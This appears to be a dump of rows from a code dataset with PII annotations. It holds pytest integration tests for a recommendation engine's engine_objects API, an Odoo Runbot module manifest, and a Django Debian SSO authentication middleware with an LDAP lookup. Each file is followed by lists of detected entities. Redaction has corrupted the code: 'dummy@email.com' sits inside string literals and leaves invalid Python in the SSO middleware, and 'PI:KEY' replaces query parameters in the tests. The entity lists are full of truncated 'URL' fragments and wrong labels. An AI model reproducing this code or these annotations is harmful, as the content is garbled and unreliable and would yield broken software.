'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'breakpad.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'client.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'shim.gy'], ['URL', 'options.no'], ['URL', 'options.ma'], ['URL', 'options.ma'], ['URL', 'options.no'], ['URL', 'getos.Ge'], ['URL', 'dir.re'], ['URL', 'env.it'], ['URL', 'key.st'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'common.Er'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 't.st'], ['URL', 't.st'], ['URL', 'getos.Ge'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 're.com'], ['URL', 're.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'notice.Ge'], ['URL', 'os.path.jo'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'filelist.Pa'], ['URL', 'common.Er'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.re'], ['URL', 'common.Er'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Ru'], ['URL', 'util.Do'], ['URL', 'util.Ar'], ['URL', 'util.Ge'], ['URL', 'archive.ch'], ['URL', 'bundle.re'], ['URL', 'bundle.re'], ['URL', 'bundle.ve'], ['URL', 'bundle.de'], ['URL', 'bundle.st'], ['URL', 'bundle.re'], ['URL', 'bundle.ar'], ['URL', 'version.Ch'], ['URL', 'common.Ar'], ['URL', 'os.path.ba'], ['URL', 'os.pa'], ['URL', 'version.Ch'], ['URL', 'bundle.Ge'], ['URL', 'common.Ru'], ['URL', 'component.sh'], ['URL', 'tools.tg'], ['URL', 'common.Ru'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'sdk.py'], ['URL', 'optcomplete.au'], ['URL', 'parser.pa'], ['URL', 'common.Is'], ['URL', 'options.ar'], ['URL', 'getos.Ge'], ['URL', 'options.ar'], ['URL', 'parser.er'], ['URL', 'version.Ch'], ['URL', 'version.Ch'], ['URL', 'version.Na'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 's.tar.bz'], ['URL', 'os.path.jo'], ['URL', 'options.re'], ['URL', 'options.re'], ['URL', 'os.path.jo'], ['URL', 'install-sysroot.py'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'options.sk'], ['URL', 'common.Mo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'librt.so'], ['URL', 'libpthread.so'], ['URL', 's.so'], ['URL', 'libc.so'], ['URL', 'ld-linux-armhf.so'], ['URL', 'libm.so'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'common.Co'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.sk'], ['URL', 'options.cl'], ['URL', 'os.path.jo'], ['URL', 'oshelpers.Co'], ['URL', 'options.ar'], ['URL', 'sys.ar'], ['URL', 'common.Er']] |
35 | # MIT License
# Copyright (c) 2016 Diogo Dutra dummy@email.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import tempfile
from datetime import datetime
from time import sleep
from unittest import mock
from swaggerit.models._base import _all_models
from tests.integration.fixtures import TopSellerArrayTest
import pytest
import ujson
@pytest.fixture
def init_db(models, session, api):
user = {
'name': 'test',
'email': 'test',
'password': 'test',
'admin': True
}
session.loop.run_until_complete(models['users'].insert(session, user))
tmp = tempfile.TemporaryDirectory()
store = {
'name': 'test',
'country': 'test',
'configuration': {}
}
session.loop.run_until_complete(models['stores'].insert(session, store))
item_type = {
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'stores': [{'id': 1}]
}
session.loop.run_until_complete(models['item_types'].insert(session, item_type))
strategy = {
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest'
}
session.loop.run_until_complete(models['engine_strategies'].insert(session, strategy))
engine_object = {
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}
session.loop.run_until_complete(models['engine_objects'].insert(session, engine_object))
yield tmp.name
tmp.cleanup()
_all_models.pop('store_items_products_1', None)
class TestEngineObjectsModelPost(object):
async def test_post_without_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.post('/engine_objects/', headers=headers)
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is missing'}
async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.post('/engine_objects/', headers=headers, data='[{}]')
assert resp.status == 400
assert (await resp.json()) == {
'message': "'name' is a required property. "\
"Failed validating instance['0'] for schema['items']['required']",
'schema': {
'type': 'object',
'additionalProperties': False,
'required': ['name', 'type', 'configuration', 'strategy_id', 'item_type_id', 'store_id'],
'properties': {
'name': {'type': 'string'},
'type': {'type': 'string'},
'strategy_id': {'type': 'integer'},
'item_type_id': {'type': 'integer'},
'store_id': {'type': 'integer'},
'configuration': {}
}
}
}
async def test_post(self, init_db, client, headers, headers_without_content_type):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body))
resp_json = (await resp.json())
body[0]['id'] = 2
body[0]['store'] = resp_json[0]['store']
body[0]['strategy'] = resp_json[0]['strategy']
body[0]['item_type'] = resp_json[0]['item_type']
assert resp.status == 201
assert resp_json == body
async def test_post_with_invalid_grant(self, client):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers={'Authorization': 'invalid'}, data=ujson.dumps(body))
assert resp.status == 401
assert (await resp.json()) == {'message': 'Invalid authorization'}
class TestEngineObjectsModelGet(object):
async def test_get_not_found(self, init_db, headers_without_content_type, client):
client = await client
resp = await client.get(
'/engine_objects/?store_id=2&item_type_id=1&strategy_id=1',
headers=headers_without_content_type
)
assert resp.status == 404
async def test_get_invalid_with_body(self, init_db, headers, client):
client = await client
resp = await client.get(
'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1',
headers=headers,
data='{}'
)
assert resp.status == 400
assert await resp.json() == {'message': 'Request body is not acceptable'}
async def test_get_valid(self, init_db, headers, headers_without_content_type, client):
body = [{
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {"days_interval": 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1,
'id': 1,
'store': {
'id': 1,
'name': 'test',
'country': 'test',
'configuration': {}
},
'item_type': {
'id': 1,
'store_items_class': None,
'stores': [{
'configuration': {},
'country': 'test',
'id': 1,
'name': 'test'
}],
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}]
},
'strategy': {
'id': 1,
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest',
'object_types': ['top_seller_array']
}
}]
client = await client
resp = await client.get(
'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1',
headers=headers_without_content_type
)
assert resp.status == 200
assert await resp.json() == body
class TestEngineObjectsModelUriTemplatePatch(object):
async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.patch('/engine_objects/1/', headers=headers, data='')
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is missing'}
async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.patch('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert (await resp.json()) == {
'message': '{} does not have enough properties. '\
"Failed validating instance for schema['minProperties']",
'schema': {
'type': 'object',
'additionalProperties': False,
'minProperties': 1,
'properties': {
'name': {'type': 'string'},
'configuration': {}
}
}
}
async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type):
client = await client
body = {
'configuration': {}
}
resp = await client.patch('/engine_objects/1/', headers=headers, data=ujson.dumps(body))
assert resp.status == 400
print(ujson.dumps(await resp.json(), indent=4))
assert (await resp.json()) == {
'message': "'days_interval' is a required property. "\
"Failed validating instance for schema['required']",
'schema': {
'type': 'object',
'required': ['days_interval'],
'additionalProperties': False,
'properties': {
'days_interval': {'type': 'integer'}
}
}
}
async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type):
client = await client
body = {
'name': 'Top Seller Object Test'
}
resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body))
assert resp.status == 404
async def test_patch(self, init_db, client, headers, headers_without_content_type):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body))
obj = (await resp.json())[0]
body = {
'name': 'test2'
}
resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body))
obj['name'] = 'test2'
assert resp.status == 200
assert (await resp.json()) == obj
class TestEngineObjectsModelUriTemplateGet(object):
async def test_get_with_body(self, init_db, headers, client):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert await resp.json() == {'message': 'Request body is not acceptable'}
async def test_get_not_found(self, init_db, headers_without_content_type, client):
client = await client
resp = await client.get('/engine_objects/2/', headers=headers_without_content_type)
assert resp.status == 404
async def test_get(self, init_db, headers, headers_without_content_type, client):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
body = {
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {"days_interval": 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1,
'id': 1,
'store': {
'id': 1,
'name': 'test',
'country': 'test',
'configuration': {}
},
'item_type': {
'id': 1,
'store_items_class': None,
'stores': [{
'configuration': {},
'country': 'test',
'id': 1,
'name': 'test'
}],
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}]
},
'strategy': {
'id': 1,
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest',
'object_types': ['top_seller_array']
}
}
assert resp.status == 200
assert await resp.json() == body
class TestEngineObjectsModelUriTemplateDelete(object):
async def test_delete_with_body(self, init_db, client, headers):
client = await client
resp = await client.delete('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is not acceptable'}
async def test_delete_valid(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 200
resp = await client.delete('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 204
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 404
def datetime_mock():
mock_ = mock.MagicMock()
mock_.now.return_value = datetime(1900, 1, 1)
return mock_
async def _wait_job_finish(client, headers_without_content_type, job_name='export'):
sleep(0.05)
while True:
resp = await client.get(
'/engine_objects/1/{}?PI:KEY'.format(job_name),
headers=headers_without_content_type)
if (await resp.json())['status'] != 'running':
break
return resp
def set_patches(monkeypatch):
monkeypatch.setattr('swaggerit.models.orm._jobs_meta.random.getrandbits',
mock.MagicMock(return_value=131940827655846590526331314439483569710))
monkeypatch.setattr('swaggerit.models.orm._jobs_meta.datetime', datetime_mock())
class TestEngineObjectsModelsDataImporter(object):
async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
resp = await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
assert resp.status == 201
assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
await _wait_job_finish(client, headers_without_content_type, 'import_data')
async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await client.get('/engine_objects/1/import_data?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type, 'import_data')
async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type, 'import_data')
assert await resp.json() == {
'status': 'done',
'result': {'lines_count': 3},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data',
mock.MagicMock(side_effect=Exception('testing')))
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type, 'import_data')
assert await resp.json() == {
'status': 'error',
'result': {'message': 'testing', 'name': 'Exception'},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def _post_products(client, headers, headers_without_content_type, products=[{'sku': 'test'}]):
resp = await client.post('/item_types/1/items?store_id=1',
data=ujson.dumps(products), headers=headers)
resp = await client.post('/item_types/1/update_filters?store_id=1',
headers=headers_without_content_type)
sleep(0.05)
while True:
resp = await client.get(
'/item_types/1/update_filters?store_id=1&PI:KEY',
headers=headers_without_content_type)
if (await resp.json())['status'] != 'running':
break
return resp
def set_readers_builders_patch(monkeypatch, values=None):
if values is None:
values = [[ujson.dumps({'value': 1, 'item_key': 'test'}).encode()]]
readers_builder = values
mock_ = mock.MagicMock()
mock_.return_value = readers_builder
monkeypatch.setattr(
'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers',
mock_
)
class TestEngineObjectsModelsObjectsExporter(object):
async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
set_readers_builders_patch(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
resp = await client.post('/engine_objects/1/export', headers=headers_without_content_type)
assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop):
set_patches(monkeypatch)
prods = [ujson.dumps({'value': i, 'item_key': 'test{}'.format(i)}).encode() for i in range(100)]
set_readers_builders_patch(monkeypatch, [[b'\n'.join(prods)]])
client = await client
products = [{'sku': 'test{}'.format(i)} for i in range(10)]
await _post_products(client, headers, headers_without_content_type, products)
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type)
assert await resp.json() == {
'status': 'done',
'result': {'length': 1, 'max_sells': 1, 'min_sells': 1},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error(
self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch, [])
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {
'message': "No data found for engine object 'Top Seller Object'",
'name': 'EngineError'
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
def CoroMock():
coro = mock.MagicMock(name="CoroutineResult")
corofunc = mock.MagicMock(name="CoroutineFunction", side_effect=asyncio.coroutine(coro))
corofunc.coro = coro
return corofunc
def set_data_importer_patch(monkeypatch, mock_=None):
if mock_ is None:
mock_ = mock.MagicMock()
monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', mock_)
return mock_
class TestEngineObjectsModelsObjectsExporterWithImport(object):
async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
get_data_patch = set_data_importer_patch(monkeypatch)
get_data_patch.return_value = {}
resp = await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
hash_ = await resp.json()
await _wait_job_finish(client, headers_without_content_type)
called = bool(TopSellerArrayTest.get_data.called)
TopSellerArrayTest.get_data.reset_mock()
assert hash_ == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
assert called
async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
def func(x, y, z):
sleep(1)
return {}
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
set_data_importer_patch(monkeypatch, func)
await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {
'status': 'done',
'result': {
'importer': {'lines_count': 3},
'exporter': {
'length': 1,
'max_sells': 1,
'min_sells': 1
}
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error_in_import_with_import(
self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
get_data_patch = set_data_importer_patch(monkeypatch)
get_data_patch.side_effect = Exception('testing')
await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {'message': 'testing', 'name': 'Exception'},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error_in_export_with_import(
self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch, [])
await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {
'message': "No data found for engine object 'Top Seller Object'",
'name': 'EngineError'
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
| 26,915 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Diogo Dutra'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'engine_object'], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'test_delete_valid(self'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['NRP', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['URL', 'email.com'], ['URL', 'swaggerit.mo'], ['URL', 'tests.integration.fi'], ['URL', 'pytest.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tests.integration.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tmp.na'], ['URL', 'tmp.cl'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'tests.integration.fi'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'tests.integration.fi'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'mock.Ma'], ['URL', '.now.re'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'meta.random.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'mock.Ma'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'mock.Ma'], ['URL', 'asyncio.co'], ['URL', 'corofunc.co'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'patch.re'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.ca'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.re'], ['URL', 'client.ge'], ['URL', 'client.ge'], ['URL', 'patch.si'], ['URL', 'client.ge'], ['URL', 'client.ge']] |
36 | # -*- encoding: utf-8 -*-
#
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo (dummy@email.com)
#
# Coded by: Vauxoo (dummy@email.com)
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
{
'name': 'Runbot sync remote info',
'category': 'Website',
'summary': 'Runbot',
'version': '1.0',
'description': """This module create a connection with
remote host of git to sync information.
e.g. Status of pull request
e.g. name source branch of a pull request""",
'author': 'Vauxoo',
'depends': ['runbot'],
'external_dependencies': {
},
'data': [
'data/ir_cron_data.xml',
'view/runbot_view.xml',
],
'installable': True,
}
| 1,491 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Runbot'], ['PERSON', 'Runbot'], ['PERSON', 'runbot'], ['URL', 'http://www.vauxoo.com/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com']] |
37 | # Copyright 2013 The Distro Tracker Developers
# See the COPYRIGHT file at the top-level directory of this distribution and
# at http://deb.li/DTAuthors
#
# This file is part of Distro Tracker. It is subject to the license terms
# in the LICENSE file found in the top-level directory of this
# distribution and at http://deb.li/DTLicense. No part of Distro Tracker,
# including this file, may be copied, modified, propagated, or distributed
# except according to the terms contained in the LICENSE file.
from __future__ import unicode_literals
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib import auth
from pts.accounts.models import UserEmail
from pts.core.utils import get_or_none
from pts.accounts.models import User
import ldap
class DebianSsoUserMiddleware(RemoteUserMiddleware):
"""
Middleware that initiates user authentication based on the REMOTE_USER
field provided by Debian's SSO system.
If the currently logged in user is a DD (as identified by having a @debian.org
address), he is forcefully logged out if the header is no longer found or is
invalid.
"""
header = 'REMOTE_USER'
def extract_email(self, username):
parts = [part for part in username.split(':') if part]
federation, jurisdiction = parts[:2]
if (federation, jurisdiction) != ('DEBIANORG', 'DEBIAN'):
return
return parts[-1] + dummy@email.com'
def is_debian_user(self, user):
return any(
email.email.endswith(dummy@email.com')
for email in user.emails.all()
)
def log_out_user(self, request):
if request.user.is_authenticated():
if self.is_debian_user(request.user):
auth.logout(request)
def process_request(self, request):
if self.header not in request.META:
# If a user is logged in to the PTS by Debian SSO, sign him out
self.log_out_user(request)
return
username = request.META[self.header]
if not username:
self.log_out_user(request)
return
email = self.extract_email(username)
if request.user.is_authenticated():
if request.user.emails.filter(email=email).exists():
# The currently logged in user matches the one given by the
# headers.
return
user = auth.authenticate(remote_user=email)
if user:
request.user = user
auth.login(request, user)
class DebianSsoUserBackend(RemoteUserBackend):
"""
The authentication backend which authenticates the provided remote user
(identified by his @debian.org email) in the PTS. If a matching User
model instance does not exist, one is automatically created. In that case
the DDs first and last name are pulled from Debian's LDAP.
"""
def authenticate(self, remote_user):
if not remote_user:
return
email = remote_user
email_user = get_or_none(UserEmail, email=email)
if not email_user:
names = self.get_user_details(remote_user)
kwargs = {}
if names:
kwargs.update(names)
user = User.objects.create_user(main_email=email, **kwargs)
else:
user = email_user.user
return user
def get_uid(self, remote_user):
# Strips off the @debian.org part of the email leaving the uid
return remote_user[:-11]
def get_user_details(self, remote_user):
"""
Gets the details of the given user from the Debian LDAP.
:return: Dict with the keys ``first_name``, ``last_name``
``None`` if the LDAP lookup did not return anything.
"""
l = ldap.initialize('ldap://db.debian.org')
result_set = l.search_s(
'dc=debian,dc=org',
ldap.SCOPE_SUBTREE,
'uid={}'.format(self.get_uid(remote_user)),
None)
if not result_set:
return None
result = result_set[0]
return {
'first_name': result[1]['cn'][0].decode('utf-8'),
'last_name': result[1]['sn'][0].decode('utf-8'),
}
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
